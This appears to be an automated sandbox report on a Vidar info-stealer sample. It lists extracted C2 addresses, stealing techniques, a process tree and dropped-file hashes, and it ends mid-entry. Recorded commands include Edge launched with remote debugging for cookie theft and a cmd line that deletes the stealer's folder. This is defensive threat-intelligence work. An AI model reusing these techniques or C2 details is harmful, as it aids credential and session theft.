Analysis

max time kernel: 129s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20250502-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250502-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30/06/2025, 17:46
Static task: static1

Behavioral task: behavioral1
  Sample: 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
  Resource: win10v2004-20250502-en

Behavioral task: behavioral2
  Sample: 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
  Resource: win11-20250619-en
General

Target: 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
Size: 951KB
MD5: 600623ba27769989d981904debcc3774
SHA1: 08b03982c2c7fe5b35f1379bca1e8832cb294764
SHA256: 5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd
SHA512: 42ede2b6dd77ab72afa1449e5bc2710c74e586c1468126814787c0b7ad6bfe69f6c0c58cc7b212594d217146c47c89af4f890464f726648ca9f0ea648a739328
SSDEEP: 12288:G6yQn1ME0VKFY8eoVEaXltnHGsdCBh46dV51satxZ7YT928nIpSm8satxZ7YT92l:puE0Vsb8ImfhRsatx428Issatx428I
Malware Config

Extracted
  Family: vidar
  Version: 14.4
  Botnet: 5838abba2c7ca0756153b41aab8534b5
  C2: https://t.me/q0l0o
  C2: https://steamcommunity.com/profiles/76561199872233764
  user_agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/137.0.0.0 Safari/537.36 OPR/122.0.0.0
Signatures

Detect Vidar Stealer (40 IoCs)
  Resource: behavioral1 memory dumps of PID 4128 (0x0000000000400000-0x0000000000439000); YARA rule: family_vidar_v7
Vidar family
Uses browser remote debugging (2 TTPs, 3 IoCs)
  Can be used to control the browser and steal sensitive information such as credentials and session cookies.
  PID   Process
  2940  msedge.exe
  1156  msedge.exe
  2872  msedge.exe
Unsecured Credentials: Credentials In Files (1 TTP)
  Steal credentials from unsecured files.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Obfuscated Files or Information: Command Obfuscation (1 TTP)
  Adversaries may obfuscate content during command execution to impede detection.
Suspicious use of SetThreadContext (1 IoC)
  Description                         PID  Process                                                                  procid_target
  PID 680 set thread context of 4128  680  5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe  84
System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Description  IoC                                                          Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  timeout.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MSBuild.exe
Checks processor information in registry (2 TTPs, 6 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Description        IoC                                                                                 Process
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                     msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier    msedge.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                     MSBuild.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  MSBuild.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                     chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier    chrome.exe
Delays execution with timeout.exe (1 IoC)
  PID   Process
  4440  timeout.exe
Enumerates system info in registry (2 TTPs, 6 IoCs)
  Description        IoC                                                                   Process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  msedge.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   chrome.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer  chrome.exe
  Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS                     msedge.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName   msedge.exe
Modifies data under HKEY_USERS (2 IoCs)
  Description      IoC                                                                                                         Process
  Key created      \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry                                       chrome.exe
  Set value (int)  \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133957791950124683"  chrome.exe
Modifies registry class (1 IoC)
  Description  IoC                                                                                       Process
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  msedge.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  PID   Process (distinct; 64 entries in total)
  4128  MSBuild.exe
  5684  powershell.exe
  3192  chrome.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (6 IoCs)
  PID   Process
  3192  chrome.exe
  3192  chrome.exe
  3192  chrome.exe
  3192  chrome.exe
  2940  msedge.exe
  2940  msedge.exe
Suspicious use of AdjustPrivilegeToken (9 IoCs)
  Description                       PID   Process
  Token: SeDebugPrivilege           5684  powershell.exe
  Token: SeShutdownPrivilege        3192  chrome.exe
  Token: SeCreatePagefilePrivilege  3192  chrome.exe
  Token: SeShutdownPrivilege        3192  chrome.exe
  Token: SeCreatePagefilePrivilege  3192  chrome.exe
  Token: SeShutdownPrivilege        3192  chrome.exe
  Token: SeCreatePagefilePrivilege  3192  chrome.exe
  Token: SeShutdownPrivilege        3192  chrome.exe
  Token: SeCreatePagefilePrivilege  3192  chrome.exe
Suspicious use of FindShellTrayWindow (27 IoCs)
  PID   Process (distinct; 27 entries in total)
  3192  chrome.exe
  2940  msedge.exe
Suspicious use of WriteProcessMemory (64 IoCs)
  Description (distinct; 64 entries in total)  PID   Process                                                                  procid_target
  PID 680 wrote to memory of 4128              680   5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe  84
  PID 4128 wrote to memory of 3192             4128  MSBuild.exe                                                              87
  PID 4128 wrote to memory of 5684             4128  MSBuild.exe                                                              88
  PID 3192 wrote to memory of 4632             3192  chrome.exe                                                               90
  PID 3192 wrote to memory of 4756             3192  chrome.exe                                                               91
  PID 3192 wrote to memory of 4924             3192  chrome.exe                                                               92
  PID 3192 wrote to memory of 4528             3192  chrome.exe                                                               93
Processes

[1] C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\5255d3c35b51e27e3a6104307edb6f32a1521f9892c4c8e7fb50ec97ff4dc7bd.exe"
    PID: 680
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory

  [2] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      PID: 4128
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory

    [3] C:\Program Files\Google\Chrome\Application\chrome.exe
        Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe"
        PID: 3192
        - Checks processor information in registry
        - Enumerates system info in registry
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of FindShellTrayWindow
        - Suspicious use of WriteProcessMemory

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff88865dcf8,0x7ff88865dd04,0x7ff88865dd10
          PID: 4632

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2004,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2000 /prefetch:2
          PID: 4756

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2224,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2236 /prefetch:3
          PID: 4924

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2372,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=2516 /prefetch:8
          PID: 4528

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3168 /prefetch:1
          PID: 4704

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=3204 /prefetch:1
          PID: 4612

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4192,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4244 /prefetch:2
          PID: 4844

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4520,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=4572 /prefetch:1
          PID: 3740

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5112,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5104 /prefetch:8
          PID: 1700

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5432,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5364 /prefetch:8
          PID: 3668

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5100,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5136 /prefetch:8
          PID: 5480

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5676,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5692 /prefetch:8
          PID: 4044

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5712,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5844 /prefetch:8
          PID: 5804

      [4] C:\Program Files\Google\Chrome\Application\chrome.exe
          Command line: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5136,i,8371999122642646252,388297801828033040,262144 --variations-seed-version=20250501-050124.630000 --mojo-platform-channel-handle=5868 /prefetch:8
          PID: 2552
    [3] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NonInteractive -OutputFormat Text -EncodedCommand "<base64-encoded command, placeholder>"
        PID: 5684
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3sqz0ne1\3sqz0ne1.cmdline"
          PID: 2900

        [5] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES732C.tmp" "c:\Users\Admin\AppData\Local\Temp\3sqz0ne1\CSCB76A280560FE48389084FC30EF7E3DC5.TMP"
            PID: 1500
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:2940 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ff87810f208,0x7ff87810f214,0x7ff87810f2204⤵PID:2884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:34⤵PID:548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2208,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2204 /prefetch:24⤵PID:1544
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:84⤵PID:1788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3464,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:14⤵
- Uses browser remote debugging
PID:2872
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:14⤵
- Uses browser remote debugging
PID:1156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5288 /prefetch:84⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5108,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5256 /prefetch:8
(depth 4)
PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5956,i,11883402588656859541,2804382520692313838,262144 --variations-seed-version --mojo-platform-channel-handle=5964 /prefetch:8
(depth 4)
PID:4832
-
-
-
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2nopz" & exit
(depth 3)
- System Location Discovery: System Language Discovery
PID:2092
-
C:\Windows\SysWOW64\timeout.exe
timeout /t 11
(depth 4)
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4440
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
(depth 1)
PID:4712
-
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
(depth 1)
PID:4024
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
(depth 1)
PID:3256
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
(depth 1)
PID:1784
Network
MITRE ATT&CK Enterprise v16
Defense Evasion
Modify Authentication Process 1
Obfuscated Files or Information 1
Command Obfuscation 1
Credential Access
Modify Authentication Process 1
Steal Web Session Cookie 1
Unsecured Credentials 2
Credentials In Files 2
Downloads
-
Filesize
288KB
MD5
8900ece47d3bd26ea398d48fecb34fa8
SHA1
b393c8fdafb3a733883caf02d347f22e8e19285a
SHA256
94009c06a22ae20b38a9bfeccd9aba3ad976a93531aebd36cb481ebf28eb32ea
SHA512
ba5e26519249915e7b5b55c371bc8e582d9da74b90790b5ce2f0cb4fa399a520a780dbe0e31d126c661bf006fbcd0fe83cb394a82217d6aacd574d94a1355548
-
Filesize
2B
MD5
d751713988987e9331980363e24189ce
SHA1
97d170e1550eee4afc0af065b78cda302a97674c
SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
79KB
MD5
115d9ce05d47a739e587d36f9c7d1a9e
SHA1
b64cb2738901da0b9695025ea32b90f213c69a92
SHA256
28bbe5a1f0a5060281fdf42a90c8d02de1352786aba1aa4e171c7ccd7e242f22
SHA512
835673212ac7449f17ac26efc1572715ebbdc3389a9f6a5cd053f481936a1bc52cde491453a687623de4ce70a0c54a461ffac282324635b577a70dd9f0d91bf1
-
Filesize
280B
MD5
36326fcbb6119326e7c8aa24c4156548
SHA1
ed128a9727e1d58b970e732b8c66fc827b18372b
SHA256
ac41191dcaf36d91f7bd9a077bc59b1bd7218daa27b263d1da6a548f58264987
SHA512
ed5c79f1edc0c65a1cf0ace91ea5538245c1569c3b25ae3cdf033ffcb55d37e7b09baec36570e82fc1525c24224cea08a53abab7e52db6376f48f099ffefd1fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index
Filesize
2KB
MD5
511104f39140f1055bf70ff41657eefb
SHA1
a9f1a8a91e54edb2b8e1d386d6f4acfe24016b12
SHA256
64d803b3b0b846aebce7e9682d84e312ebc1440cb173fc4d1364a9e75dece58c
SHA512
f744a512c3b2e030d6a387b4c961a79c5562c0924746220a02324ef6b5a9ce1b58d2926a2515b61c76798a7db46a5c5515072bd6deca30cffd6cc2fe5294f381
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\0fc6f7c5-ba86-48f0-8560-dff2f42d25af\index-dir\the-real-index~RFe5798c5.TMP
Filesize
2KB
MD5
bcc8812ad0f8f37dd7151537c2c32f8e
SHA1
89d561bd857bbf2f02ae44253b2181431cc85871
SHA256
d2a8d6ca44819eb7909bedec7f74f68ae1387866adcedebd320d31f9a1b73d56
SHA512
72d6a39f18058bcdd3c2ee447fe13bcb43210aeeeca1b2e625e6407e86013e5da974c8f8a64a1c2224ef793c552b46fe458b1c9114f4b2bd81b96a9a951c7eeb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\b2667d68-3d19-4df9-ab2b-65f3cd37f941.tmp
Filesize
1B
MD5
5058f1af8388633f609cadb75a75dc9d
SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
Filesize
39KB
MD5
08a98ed9e14066a563da4f73f185776e
SHA1
782731b0e39a3e6e89aefc6021909f24e5ae4bb2
SHA256
c3c670af75701aed6877ef516026d7291d38c35f29447a11be18b18e71254ab4
SHA512
ee2c553690e0480d40a38fcde06e3c4ee1d892cff2fc255938d32e5f0af771a6419ec19e6120ed921dabce8c4f4f05cb3d9ddd9eeb8cefbb2641db134a59f4fc
-
Filesize
39KB
MD5
6a453e9c77c3e7668179bc499e5dde17
SHA1
4f8a566f5826525ecadd1bf0a74e25088d1071c0
SHA256
802682aaecc1a4e1c0d713ac9b3d6a6d43f10f7f2ccfc59871f9fd9856fa23f1
SHA512
ecd07a7f5f40d919303f005f43ff4fbed915fcc53a21b2e0cdd7e0d4700c8c122bba34a5b37f67720919ecade456de91139a02c82efddf527dcee3b209232d8a
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize
2KB
MD5
cdaa77769ee24f4183ebab68c3e00ed5
SHA1
a578c607b1e8b3307d52d53f61e80c4e392b5e52
SHA256
178e41f0088fb20bd0069622e91cac6817fc3811baf6c5c95c5e03fc01a4dd6c
SHA512
4166e3eb55ddd445cbb361bd4d97b347f6cd2bc2f2fbee9d338e1f10ebfddfa37c45e3446767321ffb987272bfd8581ade8ea364d98dfeef34b86efb44a06cc3
-
Filesize
4KB
MD5
c9502303989cda40d7d8a516662853bb
SHA1
aba250755699cd1e8438f17d80d11168e4e5b7f2
SHA256
6e5507af17a40fac4faa9f25db52a0d699456c699e8215e5f32c8c678d131c8b
SHA512
321462ba3f204fb2298895998aefa3ebf5dfecf62bb99d9064008f2cc4bb577abdceaf6b597d5f73d70135261c7bb6628f5d830fecd6fce58699f84cdb1effc3
-
Filesize
1KB
MD5
d77f5ff08ccbc25bf9bb42761b94e7f9
SHA1
9b8bcdc7b692358b22c8ac3c1facab7e4c86f8ed
SHA256
7fb70e544e4d4be22ebcdd94e7fb8e0ec2eeed6e5474a73302a1e3e0adedc46c
SHA512
30da3a110ad087d5b17d1876c865d356257772daa518623f1b66d1aa65a95bc8e86d08135e30bc566d765e2f612d57c2a6d94fe06f732671de4c88594fde0b18
-
Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
156KB
MD5
b384b2c8acf11d0ca778ea05a710bc01
SHA1
4d3e01b65ed401b19e9d05e2218eeb01a0a65972
SHA256
0a6b11a5b642bf6c1938189707e109a1f48eb02018cfb146f09e74a753567d1b
SHA512
272dd92a3efbf6cefe4b13127e09a9bd6455f5fc4913e7477c6712e4c3fd67efe87bd0d5bf1ec6b1e65f8d3aa0ac99d5bcf88d8a44d3f3116527253a01dde3be
-
Filesize
36KB
MD5
40a13f9b39d6d3e649cf21f1b47da9ad
SHA1
b03d7f8ad2f90c61063e54cf45c01677f6a86942
SHA256
3cd5effba4bc90a72efe5e97609c962dd91d5b50e41f13bfa0f5606d322a5278
SHA512
7e821747ca4db1654c3ce01e31bc0bddfeb092464b0dea9aa8d5370c01dc0fc141fedcd168553c502a417b7703ced120ff53448c4135338cdff937a6f5f9cd5b
-
Filesize
1KB
MD5
3d1018b223caf0c61982a29cb26996cc
SHA1
743fd8c82380e7d72ec1cb2e05f149e148874b0e
SHA256
786a71b68cee9392682824e67abfb89e5ec70ee6fb37213491b5c9a95ac59c92
SHA512
7a632143e76410669fff27e2fa184d572a788e9d315f7c2415c7013cb07026678fe1b3e4fb1a77411f82941d7a03c64632c07d3fc1398e2df5741471b9462980
-
Filesize
369B
MD5
f78751ab1ea7f1ef1dcfec340b7270b1
SHA1
